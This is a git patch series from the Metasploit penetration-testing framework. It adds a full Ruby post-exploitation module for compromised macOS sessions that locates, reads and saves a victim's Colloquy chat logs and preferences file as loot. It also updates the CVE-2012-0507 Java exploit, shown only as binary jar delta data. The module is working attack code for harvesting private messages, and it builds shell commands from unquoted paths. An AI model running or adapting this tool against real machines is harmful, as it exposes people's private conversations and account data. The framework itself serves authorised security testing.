From bec8d40a6c3100ec6c5a8e57cab901141670694e Mon Sep 17 00:00:00 2001
From: Tod Beardsley <todb@metasploit.com>
Date: Thu, 29 Mar 2012 16:24:31 -0500
Subject: [PATCH 1/5] File permissions fix

---
 data/exploits/CVE-2012-0507.jar | Bin
 1 file changed, 0 insertions(+), 0 deletions(-)
 mode change 100644 => 100755 data/exploits/CVE-2012-0507.jar

diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar
old mode 100644
new mode 100755

From 8d2a58dfd803e3e12decbcaec16c74b7d206bf42 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Thu, 29 Mar 2012 16:24:43 -0500
Subject: [PATCH 2/5] Add post module enum_colloquy.rb to collect chatlogs and
 the preferences list

---
 modules/post/osx/gather/enum_colloquy.rb | 168 +++++++++++++++++++++++
 1 file changed, 168 insertions(+)
 create mode 100644 modules/post/osx/gather/enum_colloquy.rb

diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb
new file mode 100644
index 0000000000..9394d9c221
--- /dev/null
+++ b/modules/post/osx/gather/enum_colloquy.rb
@@ -0,0 +1,168 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::Common
+	include Msf::Post::File
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'          => 'OSX Gather Colloquy Enumeration',
+			'Description'   => %q{
+					This module will collect Colloquy's info plist file and chat logs from the
+				victim's machine.  There are three actions you may choose:  INFO, and CHATS, and
+				ALL.  Please note that the CHAT action may time a long time depending on the
+				victim machine, therefore we suggest to set the regex 'PATTERN' option in order
+				to search for certain log names (which consists of the contact's name, and a
+				timestamp).  The default 'PATTERN' is configured as "^alien" as an example
+				to search for any chatlogs associated with the name "alien".
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'sinn3r'],
+			'Platform'      => [ 'osx' ],
+			'SessionTypes'  => [ "shell" ],
+			'Actions'       =>
+				[
+					['ACCOUNTS', { 'Description' => 'Collect the preferences plists' } ],
+					['CHATS',    { 'Description' => 'Collect chat logs with a pattern' } ],
+					['ALL',      { 'Description' => 'Collect both the plists and chat logs'}]
+				],
+			'DefaultAction' => 'ALL'
+		))
+
+		register_options(
+			[
+				OptRegexp.new('PATTERN', [true, 'Match a keyword in any chat log\'s filename', '^alien']),
+			], self.class)
+	end
+
+	#
+	# Parse a plst file to XML format:
+	# http://hints.macworld.com/article.php?story=20050430105126392
+	#
+	def plutil(filename)
+		exec("plutil -convert xml1 #{filename}")
+		data = exec("cat #{filename}")
+		return data
+	end
+
+	def get_chatlogs(base)
+		chats = []
+
+		# Get all the logs
+		print_status("#{@peer} - Download logs...")
+		folders = dir("\"#{base}\"")
+		folders.each do |f|
+			# Get all the transcripts from this folder
+			trans = exec("find \"#{base}#{f}\" -name *.colloquyTranscript")
+			trans.split("\n").each do |t|
+				fname = ::File.basename(t)
+				# Check fname before downloading it
+				next if fname !~ datastore['PATTERN']
+				print_status("#{@peer} - Downloading #{t}")
+				content = exec("cat \"#{t}\"")
+				chats << {:log_name => fname, :content => content}
+			end
+		end
+
+		return chats
+	end
+
+	def get_preferences(path)
+		raw_plist = exec("cat #{path}")
+		return nil if raw_plist =~ /No such file or directory/
+
+		xml_plist = plutil(path)
+		return xml_plist
+	end
+
+	def save(type, data)
+		case type
+		when :preferences
+			p = store_loot(
+				'colloquy.preferences',
+				'text/plain',
+				session,
+				data,
+				"info.colloquy.plist"
+			)
+			print_good("#{@peer} - info.colloquy.plist saved as: #{p}")
+
+		when :chatlogs
+			data.each do |d|
+				log_name = d[:log_name]
+				content  = d[:content]
+
+				p = store_loot(
+					'colloquy.chatlogs',
+					'text/plain',
+					session,
+					content,
+					log_name
+				)
+				print_good("#{@peer} - #{log_name} stored in #{p}")
+			end
+		end
+	end
+
+	def whoami
+		exec("/usr/bin/whoami")
+	end
+
+	def dir(path)
+		subdirs = exec("ls -l #{path}")
+		return [] if subdirs =~ /No such file or directory/
+		items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten
+		return items
+	end
+
+	def exec(cmd)
+		begin
+			out = cmd_exec(cmd).chomp
+		rescue ::Timeout::Error => e
+			vprint_error("#{@peer} - #{e.message} - retrying...")
+			retry
+		rescue EOFError => e
+			vprint_error("#{@peer} - #{e.message} - retrying...")
+			retry
+		end
+	end
+
+	def run
+		if action.nil?
+			print_error("Please specify an action")
+			return
+		end
+
+		@peer = "#{session.session_host}:#{session.session_port}"
+		user = whoami
+
+		transcripts_path = "/Users/#{user}/Documents/Colloquy Transcripts/"
+		prefs_path       = "/Users/#{user}/Library/Preferences/info.colloquy.plist"
+
+		prefs    = get_preferences(prefs_path)    if action.name =~ /ALL|ACCOUNTS/i
+		chatlogs = get_chatlogs(transcripts_path) if action.name =~ /ALL|CHATS/i
+
+		save(:preferences, prefs) if not prefs.nil? and not prefs.empty?
+		save(:chatlogs, chatlogs) if not chatlogs.nil? and not chatlogs.empty?
+	end
+
+end
+
+=begin
+/Users/[user]/Documents/Colloquy Transcripts
+/Users/[user]/Library/Preferences/info.colloquy.plist
+
+Transcript example:
+/Users/[username]/Documents/Colloquy Transcripts//[server]/[contact] 10-13-11.colloquyTranscript
+=end

From e018c6604fcc6c965ecee6f9358b93ba8f12d51f Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Fri, 30 Mar 2012 02:06:56 -0500
Subject: [PATCH 3/5] Modify CVE-2012-0507

---
 data/exploits/CVE-2012-0507.jar               | Bin 6944 -> 6147 bytes
 .../exploits/CVE-2012-0507/Exploit.java       |  58 ------
 .../exploits/CVE-2012-0507/msf/x/Exploit.java |  53 +++++
 .../CVE-2012-0507/{ => msf/x}/Help.java       |  29 ++-
 .../CVE-2012-0507/msf/x/PayloadX.java         | 193 ++++++++++++++++++
 .../browser/java_atomicreferencearray.rb      |  32 +--
 6 files changed, 275 insertions(+), 90 deletions(-)
 delete mode 100644 external/source/exploits/CVE-2012-0507/Exploit.java
 create mode 100644 external/source/exploits/CVE-2012-0507/msf/x/Exploit.java
 rename external/source/exploits/CVE-2012-0507/{ => msf/x}/Help.java (91%)
 create mode 100644 external/source/exploits/CVE-2012-0507/msf/x/PayloadX.java

diff --git a/data/exploits/CVE-2012-0507.jar b/data/exploits/CVE-2012-0507.jar
index e0c2d68188aa782f75ca6049153c5159bc8c61ad..8c0b4d6e5c73d1958a4310b5ddbce458b4eb8153 100755
GIT binary patch
delta 5098
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
JG4-F_e*lLxf#?7L

delta 5893
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
